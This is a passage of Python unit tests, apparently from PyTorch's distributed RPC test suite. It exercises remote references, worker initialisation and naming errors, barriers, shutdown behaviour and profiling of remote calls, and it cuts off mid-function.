def _test_rref_proxy_tensor(self, dst):
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
expected = torch.ones(2, 2) + 1 + 3
self.assertEqual(expected.size(), rref.rpc_sync().size())
self.assertEqual(expected + 1, rref.rpc_async().add(1).wait())
self.assertEqual(expected.view(1, 4), rref.remote().view(1, 4).to_here())
@dist_init
def test_rref_proxy_tensor(self):
self._test_rref_proxy_tensor(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_tensor_self(self):
self._test_rref_proxy_tensor(rpc.get_worker_info())
@dist_init
def test_rref_proxy_reuse(self):
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
my_function,
args=(torch.ones(2, 2), 1, 3)
)
expected = torch.ones(2, 2) + 1 + 3
proxy_rpc_sync = rref.rpc_sync()
proxy_rpc_async = rref.rpc_async()
proxy_remote = rref.remote()
self.assertEqual(expected.size(), proxy_rpc_sync.size())
self.assertEqual(expected + 1, proxy_rpc_sync.add(1))
self.assertEqual(expected.view(1, 4), proxy_rpc_sync.view(1, 4))
self.assertEqual(expected.size(), proxy_rpc_async.size().wait())
self.assertEqual(expected + 3, proxy_rpc_async.add(3).wait())
self.assertEqual(expected.view(4, 1), proxy_rpc_async.view(4, 1).wait())
self.assertEqual(expected.size(), proxy_remote.size().to_here())
self.assertEqual(expected + 5, proxy_remote.add(5).to_here())
self.assertEqual(expected.view(-1), proxy_remote.view(-1).to_here())
def _test_rref_proxy_class(self, dst):
rref = rpc.remote(dst, MyClass, args=(7,))
expected = MyClass(7)
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
expected.increment_value(3)
self.assertEqual(None, rref.rpc_sync().increment_value(1))
self.assertEqual(None, rref.rpc_async().increment_value(1).wait())
self.assertEqual(None, rref.remote().increment_value(1).to_here())
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
self.assertEqual(
expected.my_instance_method(2),
rref.rpc_sync().my_instance_method(2)
)
self.assertEqual(
expected.my_instance_method(3),
rref.rpc_async().my_instance_method(3).wait()
)
self.assertEqual(
expected.my_instance_method(4),
rref.remote().my_instance_method(4).to_here()
)
self.assertEqual(
expected.my_static_method(9),
rref.rpc_sync().my_static_method(9)
)
self.assertEqual(
expected.my_static_method(10),
rref.rpc_async().my_static_method(10).wait()
)
self.assertEqual(
expected.my_static_method(11),
rref.remote().my_static_method(11).to_here()
)
self.assertEqual(
expected.my_class_method(2, torch.zeros(2, 2)),
rref.rpc_sync().my_class_method(2, torch.zeros(2, 2))
)
self.assertEqual(
expected.my_class_method(2, torch.ones(3, 3)),
rref.rpc_async().my_class_method(2, torch.ones(3, 3)).wait()
)
self.assertEqual(
expected.my_class_method(2, torch.ones(4, 4)),
rref.remote().my_class_method(2, torch.ones(4, 4)).to_here()
)
@dist_init
def test_rref_proxy_class(self):
self._test_rref_proxy_class(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_class_self(self):
self._test_rref_proxy_class(rpc.get_worker_info())
@mock.patch.object(torch.distributed.autograd, "_init")
@mock.patch.object(torch.distributed.rpc.api, "_set_and_start_rpc_agent")
@dist_init(setup_rpc=False)
def test_register_rpc_backend_and_set_and_start_rpc_backend(
self, mock_rpc_agent, mock_dist_autograd_init
):
backend_name = "stub_backend"
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
with self.assertRaisesRegex(
RuntimeError, "^RPC backend .+: already registered$"
):
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
rpc.init_rpc(
name="worker1",
backend=backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_duplicate_name(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
store, _, _ = next(
torch.distributed.rendezvous(
self.init_method, rank=self.rank, world_size=self.world_size
)
)
rpc._init_rpc_backend(
backend=self.rpc_backend,
store=store,
name="duplicate_name",
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_duplicate_name_2(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
rpc.init_rpc(
name=worker_name(self.rank % (self.world_size - 1)),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_reinit(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
# TODO: with TCP init, rank 0 raises Address already in use because
# rank 0 is the start daemon and the store is created before checking if
# RPC is already initialized in init_rpc.
if os.environ.get("RPC_INIT_WITH_TCP", None) == "1" and self.rank == 0:
expected_reinit_err = "Address already in use"
else:
expected_reinit_err = "is already initialized"
with self.assertRaisesRegex(RuntimeError, expected_reinit_err):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
def _world_size_one(self, a, b):
if self.rank == 0:
rpc.init_rpc(
name="me",
backend=self.rpc_backend,
rank=0,
world_size=1,
rpc_backend_options=self.rpc_backend_options,
)
def _rpc_sync(x, y):
expect = x * 2
result = rpc.rpc_sync(
"me",
my_tensor_function,
args=(x, y)
)
self.assertEqual(expect, result)
def _rpc_async(x, y):
expect = x * 2
result = rpc.rpc_async(
"me",
my_tensor_function,
args=(x, y)
).wait()
self.assertEqual(expect, result)
def _remote(x, y):
expect = x * 2
result = rpc.remote(
"me",
my_tensor_function,
args=(x, y)
).to_here()
self.assertEqual(expect, result)
_rpc_sync(a, b)
_rpc_async(a, b)
_remote(a, b)
rpc.shutdown()
def test_world_size_one(self):
self._world_size_one(
torch.ones(2, 2),
torch.ones(2, 2)
)
def test_world_size_one_sparse(self):
self._world_size_one(
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init(setup_rpc=False)
def test_invalid_names(self):
from torch.distributed.rpc import WorkerInfo
worker_id = 0
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo("abc*", worker_id)
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo(" ", worker_id)
with self.assertRaisesRegex(RuntimeError, "must be non-empty"):
info = WorkerInfo("", worker_id)
# If the number in the message does not match, it is likely that the
# value of MAX_NAME_LEN in RPC WorkerInfo has changed.
with self.assertRaisesRegex(RuntimeError, "shorter than 128"):
info = WorkerInfo("".join(["a" for i in range(500)]), worker_id)
@dist_init
def test_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@staticmethod
def return_callee_id():
return rpc.get_worker_info().id
@dist_init
def test_int_callee(self):
dst_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(dst_rank, RpcTest.return_callee_id)
self.assertEqual(ret, dst_rank)
@dist_init
def test_add_with_id(self):
n = self.rank + 1
dst_rank = n % self.world_size
workder_info = rpc.get_worker_info(worker_name(dst_rank))
ret = rpc.rpc_sync(
workder_info, torch.add, args=(torch.ones(n, n), torch.ones(n, n))
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@dist_init
def test_scalar_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), n)
)
self.assertEqual(ret, (torch.ones(n, n) + n))
@dist_init
def test_async_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_nonzero(self):
n = self.rank + 1
dst_rank = n % self.world_size
x = torch.ones(self.world_size, self.world_size)
x[self.rank][self.rank] = 0
ret = rpc.rpc_sync(worker_name(dst_rank), torch.nonzero, args=(x,))
self.assertEqual(ret, x.nonzero())
def _multi_rpc(self, sparse):
dst_rank = (self.rank + 1) % self.world_size
for i in range(20):
n = i + self.rank + 1
if sparse:
x = build_sparse_tensor() * n
y = build_sparse_tensor() * n
else:
x = torch.ones(2, 2)
y = torch.ones(2, 2)
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(x, y),
)
self.assertEqual(ret, x * 2)
@dist_init
def test_multi_rpc(self):
self._multi_rpc(False)
@dist_init
def test_multi_rpc_sparse(self):
self._multi_rpc(True)
@dist_init
def test_future_wait_twice(self):
dst = worker_name((self.rank + 1) % self.world_size)
futs = []
for i in range(20):
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
torch.futures.wait_all(futs)
for fut in futs:
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
def _run_uneven_workload(self, f, x, num_repeat=30):
# worker0 drives and waits for worker1 and worker2
# throughout the test.
if self.rank == 0:
self.assertTrue(self.world_size >= 3)
# Phase 1: Only worker1 has workload.
dst = "worker1"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, f, args=(x,))
futs.append(fut)
for fut in torch.futures.collect_all(futs).wait():
self.assertEqual(fut.wait(), 0)
# Phase 2: Only worker2 has workload.
# If join is not correctly implemented,
# worker2 should be closed by now.
dst = "worker2"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, f, args=(x,))
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
def _wait_all_workers(self, f, x):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload(f, x)
# worker0 calls this at the end after waiting for RPC responses.
# worker1/2 calls this immediately and has some works after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
# Wait before proceeding to shutdown to ensure worker0 RPCs make
# it through to other workers.
dist.barrier()
rpc.shutdown(graceful=False)
@dist_init(setup_rpc=False)
def test_wait_all_workers_timeout(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
og_func = rpc.api._wait_all_workers
def wait_all_workers_sleep(timeout):
try:
rpc.api._all_gather(SlowPickleClass(0.5), timeout=timeout)
except RuntimeError as ex:
raise ex
rpc.api._wait_all_workers = wait_all_workers_sleep
try:
with self.assertRaisesRegex(RuntimeError, ''):
rpc.shutdown(graceful=True, timeout=0.01)
finally:
rpc.api._wait_all_workers = og_func
dist.barrier()
def test_wait_all_workers_dense(self):
self._wait_all_workers(heavy_rpc, torch.ones(100, 100))
def test_wait_all_workers_sparse(self):
self._wait_all_workers(heavy_rpc_sparse, build_sparse_tensor())
def _wait_all_workers_twice(self, f, x):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload(f, x)
# worker0 calls this at the end after waiting for RPC responses.
# worker1/2 calls this immediately and has some works after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
rpc.api._wait_all_workers()
# Wait before proceeding to shutdown to ensure worker0 RPCs make
# it through to other workers.
dist.barrier()
rpc.shutdown(graceful=False)
def test_wait_all_workers_twice_dense(self):
self._wait_all_workers_twice(heavy_rpc, torch.ones(100, 100))
def test_wait_all_workers_twice_sparse(self):
self._wait_all_workers_twice(heavy_rpc_sparse, build_sparse_tensor())
@dist_init
def test_all_gather(self):
info = rpc.get_worker_info()
results = rpc.api._all_gather(info.id)
expected = {}
for info in rpc._get_current_rpc_agent().get_worker_infos():
expected[info.name] = info.id
self.assertEqual(expected, results)
@dist_init
def test_all_gather_timeout(self):
rpc._set_rpc_timeout(0.1)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError,
"timed out in _all_gather after 0\\.10 seconds"
):
rpc.api._all_gather(SlowPickleClass(0.5))
else:
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.api._all_gather(SlowPickleClass(0.5))
def _test_barrier_helper(self, info, names, multi_threaded=False):
names = sorted(names)
leader = names[0]
rpc.rpc_sync(leader, _reset_count)
if not multi_threaded and info.name == leader:
self.assertEqual(_rpc_barrier_count, 0)
rpc.api._barrier(names)
rpc.rpc_sync(leader, _increment_count)
rpc.api._barrier(names)
if not multi_threaded and info.name == leader:
self.assertEqual(_rpc_barrier_count, len(names))
@dist_init
def test_rpc_barrier_all(self):
# Test rpc barrier when called with full list of workers
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
names = [worker.name for worker in all_worker_info]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_subset(self):
# Test rpc barrier when processes are called with different subsets of the full list
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
if info.id % 2:
names = [worker.name for worker in all_worker_info if worker.id % 2]
else:
names = [worker.name for worker in all_worker_info if not worker.id % 2]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_partial_subset(self):
# Test rpc barrier when some processes are not involved in the barrier
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
if info.id % 2:
names = [worker.name for worker in all_worker_info if worker.id % 2]
else:
names = [f"worker{info.id}"]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_multithreaded(self):
# This tests validates the implementation of barrier when multiple threads call into it
# We only need to check that it does not hang in this case
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
names = [worker.name for worker in all_worker_info]
threads = []
for _ in range(3):
th = threading.Thread(target=self._test_barrier_helper, args=(info, names, True))
threads.append(th)
th.start()
for th in threads:
th.join()
@dist_init
def test_graceful_shutdown_with_uneven_workload(self):
"""Test graceful termination."""
self._run_uneven_workload(heavy_rpc, torch.ones(100, 100))
@dist_init(setup_rpc=False)
def test_shutdown_followed_by_rpc(self):
# Initialize RPC.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
rpc.shutdown()
with self.assertRaisesRegex(RuntimeError, "^RPC has not been initialized"):
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
@dist_init
def test_expected_src(self):
dst_rank = (self.rank + 1) % self.world_size
expected_src_rank = (self.rank - 1) % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), set_value, args=(self.rank,))
value = VALUE_FUTURE.result()
self.assertEqual(value, expected_src_rank)
@dist_init
def test_py_built_in(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), min, args=(n, n + 1, n + 2))
self.assertEqual(ret, min(n, n + 1, n + 2))
@dist_init
def test_py_user_defined(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(ret, my_function(n, n + 1, n + 2))
def test_build_rpc_profiling_key(self):
# Tests that the name that shows up as an Event in profiling RPCs has all
# the necessary information.
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
rpc_profiling_key = _build_rpc_profiling_key(
exec_mode, "foo", "worker0", "worker1"
)
self.assertIn(exec_mode.value, rpc_profiling_key)
self.assertIn("foo", rpc_profiling_key)
self.assertIn("worker0", rpc_profiling_key)
self.assertIn("worker1", rpc_profiling_key)
def check_profiling_info(self, self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode):
self.assertTrue(self_worker_name in rpc_event.name)
self.assertTrue(dst_worker_name in rpc_event.name)
if isinstance(func, torch.jit.ScriptFunction):
self.assertTrue(torch._jit_internal._qualified_name(func) in rpc_event.name)
else:
self.assertTrue(func.__name__ in rpc_event.name)
self.assertTrue(rpc_exec_mode.value in rpc_event.name)
self.assertEqual(rpc_event.count, 1)
@dist_init
def test_profiler_rpc_record_shapes(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
t1, t2 = torch.ones(100), torch.ones(100)
with _profile(record_shapes=True) as prof:
rpc.rpc_sync(dst_worker, torch.add, args=(t1, t2))
function_events = prof.function_events
remote_events = [event for event in function_events if event.is_remote]
remote_add_event = [
event for event in remote_events if "aten::add" in event.name
][0]
remote_add_input_shapes = remote_add_event.input_shapes
# Run profiler on equivalent local op and validate shapes are the same.
with _profile(record_shapes=True) as prof:
torch.add(t1, t2)
local_function_events = prof.function_events
local_add_event = [
event for event in local_function_events if "aten::add" in event.name
][0]
local_add_input_shapes = local_add_event.input_shapes
self.assertEqual(remote_add_input_shapes, local_add_input_shapes)
@dist_init
def test_profiler_rpc_memory(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with _profile(profile_memory=True) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
# if cpu_memory_usage was not propagated over the wire, this set would
# only contain 0 (indicates no memory being profiled)
self.assertNotEqual({0}, event_cpu_mem_usages)
# No memory profiled if profile_memory=False
with _profile(profile_memory=False) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
self.assertEqual({0}, event_cpu_mem_usages)
@dist_init
def test_profiler_export_trace(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with _profile() as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
events = p.function_events
with TemporaryFileName() as fname:
path = fname
p.export_chrome_trace(path)
with open(path) as f:
trace = json.load(f)
event_names = [event['name'] for event in trace]
for expected_event_name in EXPECTED_REMOTE_EVENTS + [RPCExecMode.ASYNC.value]:
event_exists = any([expected_event_name in event_name for event_name in event_names])
self.assertTrue(event_exists)
@dist_init
def test_profiler_rpc_key_names(self):
# tests that remote events are properly prefixed with the RPC profiling key.
if self.rank != 1:
return
# Spawn multiple threads that send RPCs to ensure keys are correctly
# prefixied when there are multiple RPCs being created/in flight at the
# same time.
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
def rpc_with_profiling(dst_worker):
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
fut.wait()
events = prof.function_events
remote_event_names = {
event.name: event for event in events if event.is_remote
}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
dst_worker,
)
remote_event_name_set = set(EXPECTED_REMOTE_EVENTS)
for name, event in remote_event_names.items():
# Ensure that we have the expected key as part of the remote
# event.
self.assertTrue(name.startswith(rpc_profiling_key))
self.assertTrue(event.is_remote)
self.assertTrue(event.node_id == rpc.get_worker_info(dst_worker).id)
# Ensure that the remote event name also contains the operator.
operator_name_substr = name[len(rpc_profiling_key) :]
# Note: we don't assert that every remote event needs to be
# in the above set, the set is just a representative set of
# what we expect to see. The profiler can change and add more
# events, but we should always expect to see this representative
# set.
matching_event = {
remote_event_name
for remote_event_name in remote_event_name_set
if remote_event_name in operator_name_substr
}
remote_event_name_set -= matching_event
# The set should be empty, otherwise its contained elements did
# not show up in the remote profiler output.
self.assertTrue(
remote_event_name_set == set(),
f"Expected {remote_event_name_set} to be included in remote profiler output.",
)
for dst in dst_ranks:
dst_worker = worker_name(dst)
num_parallel_rpcs = 2
with concurrent.futures.ThreadPoolExecutor(
max_workers=num_parallel_rpcs
) as executor:
futs = [
executor.submit(rpc_with_profiling, dst_worker)
for _ in range(num_parallel_rpcs)
]
# Wait for workers to finish test
for fut in futs:
fut.result()
def _run_test_profiler_remote_events_profiled(self):
# Tests that we can successfully invoke the profiler on a remote node,
# and collect the remote events back in the local profiler.
if self.rank != 1:
return
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
for dst in dst_ranks:
dst_worker = worker_name(dst)
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
ret = fut.wait()
events = prof.function_events
rpc_event = get_function_event(events, RPCExecMode.ASYNC.value)
self.check_profiling_info(
worker_name(self.rank),
dst_worker,
udf_with_torch_ops,
rpc_event,
RPCExecMode.ASYNC,
)
remote_events = {event.name: event for event in events if event.is_remote}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
worker_name(dst),
)
for expected_remote_event_name in EXPECTED_REMOTE_EVENTS:
expected_key = rpc_profiling_key + REMOTE_OP_STR + expected_remote_event_name
self.assertTrue(expected_key in remote_events)
remote_event = remote_events[expected_key]
# Remote event should have a node ID corresponding to the worker
# it ran on.
self.assertEqual(remote_event.node_id, dst)
# Validate order remote events show up in profiling output.
def convert_remote_to_local(event_name):
remote_op_key = rpc_profiling_key + REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key)
+ len(remote_op_key) :
]
remote_events_list = [
convert_remote_to_local(event.name)
for event in events
if convert_remote_to_local(event.name) in EXPECTED_REMOTE_EVENTS
]
self.assertEqual(
set(remote_events_list),
set(EXPECTED_REMOTE_EVENTS),
f"Mismatch between profiled events: {set(remote_events_list)} and expected events: {set(EXPECTED_REMOTE_EVENTS)}",
)
@dist_init
def test_profiler_remote_events_profiled(self):
self._run_test_profiler_remote_events_profiled()
@dist_init
def test_profiler_remote_events_profiled_single_threaded(self):
self._run_test_profiler_remote_events_profiled()
def run_profiling_workload(self, dst):
fut = rpc.rpc_async(
worker_name(dst),
torch.mul,
args=(
torch.tensor(1.0, requires_grad=True),
torch.tensor(1.0, requires_grad=True),
),
)
fut.wait()
def _run_rpc_profiling_async_function(self, device="cpu"):
if self.rank != 1:
return
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
with _profile() as prof:
ret = rpc.rpc_async(
dst1, slow_async_add, args=(dst2, x, y, device), timeout=20
)
out = ret.wait()
function_events = prof.function_events
# slow_async_add resulted in an RPC from dst1 -> dst2, so this should be
# recorded.
key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_async_add.__qualname__, worker_name(self.rank), dst1
)
nested_rpc_key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_add.__qualname__, dst1, dst2
)
expected_key = key_prefix + REMOTE_OP_STR + nested_rpc_key_prefix
remote_events = [event for event in function_events if event.is_remote]
rpc_remote_event = [
event for event in remote_events if event.name == expected_key
]
self.assertEqual(1, len(rpc_remote_event))
rpc_remote_event = rpc_remote_event[0]
self.assertEqual(rpc_remote_event.node_id, (self.rank + 1) % self.world_size)
# slow_async_add's RPC does an add on dst2, which should be reflected as well.
remote_add_key = (
expected_key + REMOTE_OP_STR + torch.jit._builtins._find_builtin(torch.add)
)
remote_add_event = [
event for event in remote_events if event.name == remote_add_key
]
self.assertEqual(1, len(remote_add_event))
remote_add_event = remote_add_event[0]
# Validate that node_id is dst2.
self.assertEqual(remote_add_event.node_id, (self.rank + 2) % self.world_size)
@dist_init
def test_rpc_profiling_async_function(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_async_function_single_threaded(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_remote_record_function(self):
# test that functions run over RPC with record_function show the expected
# profiled block.
if self.rank != 1:
return
dst_ranks = [i for i in range(self.world_size) if i != self.rank]
for dst_rank in dst_ranks:
dst_worker = worker_name(dst_rank)
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=(-1, True))
fut.wait()
function_events = prof.function_events
record_function_remote_event = [
evt for evt in function_events if "##forward##" in evt.name
]
self.assertEqual(1, len(record_function_remote_event))
record_function_remote_event = record_function_remote_event[0]
self.assertEqual(record_function_remote_event.node_id, dst_rank)
# cpu_children only returns direct children, so here we get all
# children recursively.
def get_cpu_children(event):
if not event.cpu_children:
return []
cpu_children = event.cpu_children
for e in event.cpu_children:
cpu_children.extend(get_cpu_children(e))
return cpu_children
remote_children = get_cpu_children(record_function_remote_event)
# Get local children and verify parity.
with _profile() as prof:
udf_with_torch_ops(-1, True)
local_function_events = prof.function_events
local_record_function_event = [
evt for evt in local_function_events if "##forward##" in evt.name
][0]
local_children = get_cpu_children(local_record_function_event)
local_children_names = [
evt.name for evt in local_children
]
REMOTE_OP_STR = "#remote_op: "
def convert_remote_to_local(event_name):
remote_op_key = REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key) + len(remote_op_key) :
]
for evt in remote_children:
local_name = convert_remote_to_local(evt.name)
self.assertTrue(local_name in local_children_names)
def validate_profiling_workload(self, dst, prof):
def convert_remote_to_local(event_name):
return event_name[event_name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR) :]
events = prof.function_events
remote_events = {
convert_remote_to_local(event.name): event
for event in events
if event.is_remote
}
self.assertTrue("aten::mul" in remote_events)
remote_mul_event = remote_events["aten::mul"]
self.assertEqual(remote_mul_event.node_id, dst)
self.check_profiling_info(
worker_name(self.rank),
worker_name(dst),
torch.mul,
remote_mul_event,
RPCExecMode.ASYNC,
)
def _run_test_profiler_with_autograd_context(self):
dst = (self.rank + 1) % self.world_size
if self.rank == 1:
# Cases where we can double wrap messages with profiling information and autograd info.
with dist_autograd.context() as context_id:
with _profile() as prof:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
# Ensure that flipped order of ctx managers results in events being
# recorded as expected.
with _profile() as prof:
with dist_autograd.context() as context_id:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
@dist_init
def test_profiler_with_autograd_context_single_threaded(self):
self._run_test_profiler_with_autograd_context()
@dist_init
def test_profiler_with_autograd_context(self):
self._run_test_profiler_with_autograd_context()
def _profiler_test_with_rpc(self, rpc_exec_mode, func, args, use_record_function=False, dst=None):
dst = dst if dst is not None else (self.rank + 1) % self.world_size
# only run profiler on rank 1.
if self.rank == 1:
with _profile() as prof:
record_function_ctx_mgr = (
contextlib.suppress()
if not use_record_function
else torch.autograd.profiler.record_function(
"foo"
)
)
with record_function_ctx_mgr as rf:
if rpc_exec_mode == RPCExecMode.SYNC:
rpc.rpc_sync(worker_name(dst), func, args=args)
elif rpc_exec_mode == RPCExecMode.ASYNC:
fut = rpc.rpc_async(worker_name(dst), func, args=args)
fut.wait()
else:
self.assertTrue(rpc_exec_mode == RPCExecMode.REMOTE)
rref = rpc.remote(worker_name(dst), func, args=args)
rref.to_here()
# To avoid flakiness, wait for the RRef to be profiled. This
# means that we received the acknowledgement of successful
# creation on the owner and ran the callbacks responsible
# for recording the profiling event.
rref._get_profiling_future().wait()
events = prof.function_events
rpc_event = get_function_event(events, rpc_exec_mode.value)
# verify Node ID for this rpc event.
self.assertEqual(rpc_event.node_id, self.rank)
# Ensure recording of remote events.
remote_events = {event for event in events if event.node_id == dst} - {rpc_event}
self.assertGreaterEqual(len(remote_events), 1)
for remote_event in remote_events:
self.assertEqual(remote_event.node_id, dst)
if use_record_function:
scope_event = get_function_event(events, "foo")
# Since RPC call is within the scope, its CPU interval should be
# contained within foo's interval.
self.assertLessEqual(scope_event.time_range.start, rpc_event.time_range.start)
self.assertGreaterEqual(scope_event.time_range.end, rpc_event.time_range.end)
# the sender, dest worker, function run, and type of RPC should all
# be recorded.
self_worker_name = worker_name(self.rank)
dst_worker_name = worker_name(dst)
self.check_profiling_info(self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode)
if use_record_function:
# verify order by ensuring that the outer context comes
# before the rpc event.
foo_event_ix = next(i for i, event in enumerate(events) if "foo" in event.name)
rpc_event_idx = next(i for i, event in enumerate(events) if rpc_exec_mode.value in event.name)
self.assertLess(foo_event_ix, rpc_event_idx)
def _run_test_profiler_with_sync_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_sync_rpc_udf(self):
self._run_test_profiler_with_sync_rpc_udf()
@dist_init
def test_profiler_with_sync_rpc_udf_single_threaded(self):
